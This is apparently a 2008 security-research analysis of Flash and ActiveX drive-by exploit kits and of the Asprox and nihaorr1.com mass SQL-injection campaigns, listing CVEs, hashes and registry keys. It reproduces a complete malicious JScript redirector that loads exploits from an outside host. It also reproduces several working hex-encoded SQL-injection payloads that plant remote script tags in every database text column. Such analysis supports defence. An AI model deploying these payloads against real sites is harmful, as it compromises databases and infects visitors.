Adobe Flash Player Exploitation

Several sources including Symantec DeepSight, SANS ISC, and Dancho Danchev have reported in-the-wild exploitation of a vulnerability affecting Adobe Flash Player. The vulnerability was originally thought to be an 0-day, but analysis has revealed it is more likely the previously reported Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability (CVE-2007-0071). Adobe Flash Player 9.0.115.0 is affected, and there are conflicting reports whether and to what degree the current version 9.0.124.0 is affected. Initial websites serving Flash exploit code include dota11.cn, wuqing17173.cn, woai117.cn, and play0nlnie.com. Script references to these sites (and a growing number of others) are belived to have been injected into legitimate websites through SQL injection attacks. The malicious sites utilize a Chinese MPack-type tool to generate numerous exploits in an effort to install PSW.OnlineGames trojans designed to exfiltrate gaming credentials. The following provides a sample analysis of wuqing17173.cn.

wuqing17173.cn Analysis:


A Google search for the identified malicious domain wuqing17173.cn (58.215.87.11) currently returns a single result that includes an injected iframe for count18[dot]wuqing17173[dot]cn/click.aspx.php.












The compromised accttstore.com site hosting the count18[dot]wuqing17173[dot]cn iframe deals with selling World of Warcraft (WoW) assets. The aversary end goal is to exfiltrate online gaming credentials, so websites dedicated to WoW are prime targets for injecting iframe and script redirects.








The count18[dot]wuqing17173[dot]cn/click.aspx.php connection returns what looks to be an HTTP 404 error, but the bottom of the page contains malicious JavaScript. The script checks for several ActiveX controls and if present, redirects the victim to specific exploit code hosted at www[dot]0novel[dot]com (58.215.87.11). The following vulnerabilities are attempted to be exploited.

File: Flash.swf, Flash1.swf
Vulnerability: Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability
CVE: (BID 28695)

File: ms06014.js
Vulnerability: MDAC RDS.Dataspace ActiveX Control Vulnerability
CVE: CVE-2006-0003

File: Real.js
Vulnerability: RealPlayer IERPCtl ActiveX Playlist Handling Buffer Overflow Vulnerability
CVE: CVE-2007-5601

File: Lz.htm
Vulnerability: Ourgame GLWorld ActiveX Control Multiple Buffer Overflow Vulnerabilities
CVE: CVE-2008-0647

File: Bf.htm
Vulnerability: Baofeng Storm ActiveX Controls Multiple Remote Buffer Overflow Vulnerabilities
CVE: CVE-2007-4816, CVE-2007-4943

File: Xl.htm
Vulnerability: Xunlei Thunder DapPlayer ActiveX Control Buffer Overflow
CVE: CVE-2007-6144

count18[dot]wuqing17173[dot]cn/click.aspx.php code:

<script>window.onerror=function(){return true;}</script>
<Script Language="JScript">
var cook = "silentwm";
function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}
function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = window.document.cookie.indexOf(";", offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}
function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}
function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}
register(cook);
window.defaultStatus="....";
try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http:\/\/www.0novel.com\/ms06014.js><\/script>")}
else
{
var Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",");
if(Flashver[2] == 115){document.write('<embed src="flash.swf"></embed>');}
if(Flashver[2] == 47){document.write('<embed src="flash1.swf"></embed>');}
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
catch(j){};
finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<script src=http:\/\/www.0novel.com\/real.js><\/script>')}
else
{
document.write('<iframe width=10 height=0 src=rl.htm></iframe>')}}}
try{ var g;
var glworld=new ActiveXObject("GLIEDown.IEDown.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src=lz.htm></iframe>')}}
try{ var h;
var storm=new ActiveXObject("MPS.StormPlayer.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src=bf.htm></iframe>')}}
try{ var f;
var thunder=new ActiveXObject("DPClient.Vod");}
catch(f){};
finally{ if(f!="[object Error]"){
document.write('<iframe width=50 height=0 src=xl.htm></iframe>')}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && j=="[object Error]")
{location.replace("about:blank");}
}}
}
openWM();
</script>
<embed sRc=flash.swf width=50 height=0></embed>

The strings of Flash.swf include the payload http: //www[dot]lovedai[dot]cn/back.css (58.215.87.11) executed as c:\6123t.exe. The payload from the other exploits was www[dot]0novel[dot]com/back.css (58.215.87.11).

Flash.swf strings:

FWS
fHY<
`P3
t.x
urlmon.dll
SSR
;C:\6123t.exe
ahU
http: //www[dot]lovedai[dot]cn/back.css
t.x
C
new_fla MainTimeline
flash.display
MovieClip
new_fla:MainTimeline
frame1
addFrameScript
Object flash.events
EventDispatcher
DisplayObject
InteractiveObject
DisplayObjectContainer
Spritenew_fla.MainTimeline

Malware Analysis:

The malware back.css is a binary file designed to look like a cascading style sheet. The malware creates backow.dll in the victim’s Temp directory and creates and deletes C:\ w1.hiv and C:\w2.hiv. The malware backow.dll is detected as a Infostealer.Gampass variant (Symantec) designed to exfiltrate World of Warcraft (WoW) online gaming accounts.

Filename: back.css
MD5: 54939e5ffb291518a1fb0f28a92faf41
Size: 25.7 KB (26,368 bytes)

Back.css creates:

C:\Documents and Settings\username\Local Settings\Temp\backow.dll

Filename: backow.dll
MD5: 86909167e5b867ea509bd91dba6add03
Size: 14.2 KB (14,592 bytes)

The binary strings of backow.dll reveal WoW domains and the file realmlist.wtf which is a WoW text file that tells the WoW-client which server to connect to.

00003134 00403D34 0 realmlist.wtf
0000317C 00403D7C 0 .worldofwarcraft.com
0000319C 00403D9C 0 .wowchina.com

Back.css creates the following registry keys:

HKEY_CURRENT_USER\Software\ComWaraisn "{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}"
Type: REG_SZ
Data:
HKEY_CURRENT_USER\Software\ComWaraisn "{AEB6717E-7E19-11d0-97EE-00C04FD91972}"
Type: REG_SZ
Data:
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4} "(Default)"
Type: REG_SZ
Data: Windows
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\DOCUME~1\username\LOCALS~1\Temp\backow.dll
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}\InProcServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks "{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}"
Type: REG_SZ
Data:

Asprox Trojan and banner82.com

On May 19, 2008 Dancho Danchev discussed fast-fluxing SQL injections this time involving the domain banner82.com. The banner82.com SQL injection attacks are similar to the previous direct84.com injections, but there are some slight differences.

SQL Injection Attack:

DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461655F437572736F72 AS
VARCHAR(4000));EXEC(@S);--

Decodes to:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''script src=http: //www[dot]banner82[dot]com/b.js script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Tae_Cursor

The user-agent for the injection was: Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1; .NET CLR 2.0.50727)

Banner82.com Domain
As reported by Danchev, the domain uses fast-flux technology (double-flux) with a rotating pool of proxy peer and DNS IP addresses. A small sample during analysis revealed:

24.126.130.229
67.167.252.180
69.247.201.61
71.81.34.118
74.129.121.181
75.118.8.92
78.92.76.30
89.170.16.252
99.151.145.10
99.254.31.140

Banner82.com Site
The b.js file may redirect to malicious code at a varitiey of locations. A sample analysis revealed the following.

injected script: http: //www[dot]banner82[dot]com/b.js

b.js returned an iframe redirect to: http: //banner82[dot]com/cgi-bin/index.cgi?ad

http: //banner82[dot]com/cgi-bin/index.cgi?ad returned a location redirect to: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox

http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox returned two layers of obfuscated code (callee.toString() + location.href)

The result is script a redirect to http: //66[dot]199[dot]242.[dot].26 /cgi-bin/index.cgi?ad75d33b00000258007e11f339060000000002e547d1afff02656e2d75730000000000

(the string characters vary with each connection)

Two more layers of obfuscated code (callee.toString() + location.href) reveal Neosploit generated exploit code targeted at the following vulnerabilities:

MDAC RDS.Dataspace ActiveX control vulnerability (CVE-2006-0003)
AOL SB.SuperBuddy.1 ActiveX Control Remote Code Execution Vulnerability (CVE-2006-5820)
GOM Player GOM Manager ActiveX Control Buffer Overflow (CVE-2007-5779)
CA Products DSM ListCtrl ActiveX Control Code Execution Vulnerability (CVE-2008-1472)
Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability (CVE-2007-0059)
Heap-based buffer overflow in DirectAnimation.PathControl COM object (CVE-2006-4446)

The payload was a request for the binary file: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?ad75d33b00000258027e11f339060000000002e547d1e60002040900000000020

Malware Analysis:
The payload was saved as "index"

Filename: (index.exe) – long string of characters
MD5: 60b9fbb8ba14171cd5d3d1fd86ddd564
Size: 48.0 KB (49,152 bytes)

The malware made the following connection to retrieve common.bin (spam instructions) and cmdexe.bin (SQL injection tool msscntr32.exe)

POST /forum.php HTTP/1.1
Host: 66[dot]199[dot]241[dot]98

POST /forum_asp.php HTTP/1.1
Host: 66[dot]197[dot]168[dot]5

The "index" malware searches for installations of CuteFTP and WS_FTP. The following files were created:

C:\WINDOWS\System32\aspimgr.exe Trojan.Asprox (Symantec)
C:\WINDOWS\s32.txt
C:\WINDOWS\System32\msscntr32.exe

Filename: aspimgr.exe
MD5: bb0c22f33cbf8be8a264e96ef6895ce4
Size: 72.0 KB (73,728 bytes)

Filename: msscntr32.exe
MD5: 30afb898ba27e925f41eab9e68b62833
Size: 20.0 KB (20,480 bytes)

The following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft "(Default)"
Type: REG_SZ
Data: {056B8C51-1B27-4D61-81CA-66EA278842B7}

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "DisplayName"
Type: REG_SZ
Data: Microsoft ASPI Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\aspimgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_ASPIMGR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "DisplayName"
Type: REG_SZ
Data: Microsoft Security Center Extension
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\msscntr32.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_MSSCENTER\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00

The malware aspimgr.exe makes the following connections and sets up an HTTP server on port 80.

* Connects to \"ns.uk2.net\" on port 53 (IP)
* Connects to \"www.yahoo.com\" on port 80 (IP)
* Connects to \"www.web.de\" on port 80 (IP)

The Asprox malware generated phishing emails related to "NatWest OnLine Banking"

Asprox Trojan and direct84.com

On 13 May 2008 SecureWorks posted an article on a SQL-injection attack tool that was being distributed within the Asprox botnet. The tool defaults to injecting a script reference to direct84[dot]com/7.js.

SQL-injection tool:

Filename: msscntr32.exe
MD5: b33be04bff3a9953a46c26dbc853af5c
Size: 17.5 KB (17,920 bytes)

The initial HTTP requests used by the msscntr32.exe attack tool will appear similar to the following:

@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630 0680061007200280032003500350029002C00400043002000760061007200630068006 10072002800320035003500290020004400450043004C00410052004500200www.example.com
The CAST hex decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE

The full functionality of the tool is unknown at this time but binary string analysis reveals some potential capabilities. The following relevant strings were observed.

A SQL statement that includes the default injected direct84[dot]com/7.js script.

63006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E00640069007200650063007400380034002E0063006F006D002F0037002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- 4002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E0076006500720074002800760061007200

The CAST hex decodes to:

char,['+@C+']))+'' script src=http ://www[dot].direct84[dot]com/7.js script''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor??????????ì????? FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(var

The binary strings include a Google search that looks for “inurl%:asp inurl%:%s” with 100 results per page and the language setting set to English.

00005178 00405178 0 www.google.com
000051B0 004051B0 0 /search?hl=en&as_epq=&as_oq=&as_eq=&num=100&lr=lang_en&as_filetype=&ft=i&as_sitesearch=&as_qdr=all&as_rights=&as_occt=any&cr=countryUS&as_nlo=&as_nhi=&safe=images&as_q=inurl%%3Aasp+inurl%%3A%s&start=%d

The binary strings include a reference to direct84[dot]com/7.js as well as www[dot]answers.com and youtube.com. It is unknown if these domains are used to test connectivity or for decoy traffic.

00005484 00405484 0 direct84[dot]com/7.js
000054C0 004054C0 0 http://
000054DC 004054DC 0 .asp?
000054F4 004054F4 0 .google.
00005518 00405518 0 www[dot]answers[dot]com
00005554 00405554 0 youtube[dot]com
00005580 00405580 0 cache:

The following user-agent is used by the tool during SQL injection attacks

00005598 00405598 0 Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.25

Several IPs and a reference to s32.txt were visible.

00005A9C 00405A9C 0 s32.txt
00005AC0 00405AC0 0 66.199.241.98
00005ACE 00405ACE 0 82.103.140.75
00005ADC 00405ADC 0 72.21.63.114
00005AE9 00405AE9 0 66.232.102.169
00005AF8 00405AF8 0 66.96.196.53

direct84.com analysis:
The direct84.com domain currently fast-fluxes to several different IPs in the US, Israel and Poland. A short interval included the following round-robin addresses (146.6.143.67, 172.163.165.232, 212.160.151.233, 66.1.4.187, 68.45.135.137, 69.73.111.7, 71.201.175.192, 74.248.14.151, 84.109.131.90, 89.77.235.81)

The direct84.com 7.js script returned an iframe redirect to http: //67[dot]228[dot]13[dot]98/cgi-bin/index.cgi?user1. (This and following redirect paths continually change).

The 67[dot]228[dot]13[dot]98 cgi request returns an iframe redirect to http: //216[dot]32[dot]85[dot]234/index.php

The index.php returned 3 exploits:
Microsoft DirectX Media 6.0 Live Picture Corporation DirectTransform FlashPix ActiveX control buffer overflow (CVE-2007-4336)
Apple QuickTime RTSP Content-Type header stack buffer overflow (CVE-2007-6166)
MDAC RDS.Dataspace ActiveX control vulnerability (CVE-2006-0003)

The payload is http: //216[dot]32[dot]85[dot]234/load.php?MSIE downloaded as ldr.exe.

malware analysis:
The malware ldr.exe is detected as Trojan.Asprox (Symantec)

Filename: ldr.exe
MD5: f27dc661f7b51dd76adfb2d371b888e8
Size: 48640

The following files are created:

C:\WINDOWS\db32.txt.
C:\WINDOWS\system32\aspimgr.exe.
C:\WINDOWS\ws386.ini.
C:\WINDOWS\s32.txt.

The following file is deleted:

C:\WINDOWS\db32.txt

The following registry keys are created to install aspimgr.exe as a service.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "DisplayName"
Type: REG_SZ
Data: Microsoft ASPI Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\aspimgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_ASPIMGR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft "(Default)"
Type: REG_SZ
Data: {4C7783CA-076B-4313-BBF1-21FB818E7701}

The malware aspimgr.exe makes the following connections and sets up an HTTP server on port 80.

* Connects to \"ns.uk2.net\" on port 53 (IP).
* Connects to \"www.yahoo.com\" on port 80 (IP).
* Connects to \"www.web.de\" on port 80 (IP).
* Connects to \"FAKE\" on port 4660 (IP).

The malware aspimgr.exe initiates a POST connection to http: //66[dot]232[dot]102[dot]169/forum.php. The connection passes system and trojan characteristics and a binary file common.bin is returned which contains trojan spamming instructions to include IP addresses, email addresses, SMTP commands, and spam email content. Common.bin can be decoded by XORing each byte with 27 (hex 0x1B) as previously referenced at SANS.

A sample decoded common.bin file:

98.200.11.115567.161.226.835129.59.138.199568.45.135.137584.109.131.90568.249.106.122524.126.130.229598.208.97.485<5_n>70.231.150.1615209.74.208.75589.78.235.81584.10.100.196575.137.93.12586.16.211.245566.233.229.99574.60.224.365<5_m>74.50.120.15055/customerup5ate5/confirm.aspx5/in5ex.php5/55/5etails.aspx5/94.js5/servlet5/profile5/ecar5s5/7.js5/olb5/custform5524.74.176.23755akronchablis@gar5ener.com55akroncha5@earthlink.net55akroncha5@technologist.com55akroncha55@unite5layer.com55akroncha5wick@royalgar5ensupplies.com55akronchaff@rrfabrications.com55akronchagrin@hair5resser.net55akronchain@clerk.com55akronchain@5iplomats.
[truncated]
Message-ID: <%%MSGID%%>55From: %%FROM%%55To: <%%RCPT%%>55Subject: %%SUBJ%%55Date: %%DATE%%55MIME-Version: 1.055Content-Type: multipart/alternative;555boun5ary="%%BND:1%%"55X-Priority: 355X-MSMail-Priority: Normal55X-Mailer: Microsoft Outlook Express 6.00.2900.218055X-MimeOLE: Pro5uce5 By Microsoft MimeOLE V6.00.2900.21805555This is a multi-part message in MIME format.5555--%%BND:1%%55Content-Type: text/plain;555charset="iso-8859-1"55Content-Transfer-Enco5ing: quote5-printable5555 Get popular cheap Soft right now!5 Absolutely all OF OUR OEMS ARE AVAILABLE ON EVERY EUROPEAN LANGUAGES -5 English, French, Italian, Spanish, German an5 any others..55 Win5ows Vista Ultimate - $71.065 Win5ows XP Pro With SP2 - $57.555 Office Enterprise 2007 - $72.015
[truncated]
helo5555<11300000resolve55<11301010ptr55<11300010reverse55<11301010fqdn55<113000115nserror55<113000115nsinvali555<113000115nsfail55<113000115nslookup55
[truncated]

Spamming must pay well...

nihaorr1.com SQL Injection

nihaorr1.com has been used in SQL injection attacks since at least April 2008. The domain was also the source of the automated Chinese CLI/SQL injection tool posted at SANS.

SQL injection attack:

Injected SQL Statement:
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);

The CAST hex decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+'' script src=http: //www[dot]nihaorr1[dot]com/1.js script ''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

nihaorr1.com site code:
The injected script www[dot]nihaorr1[dot]com/1.js returns an iframe redirect to 1.htm

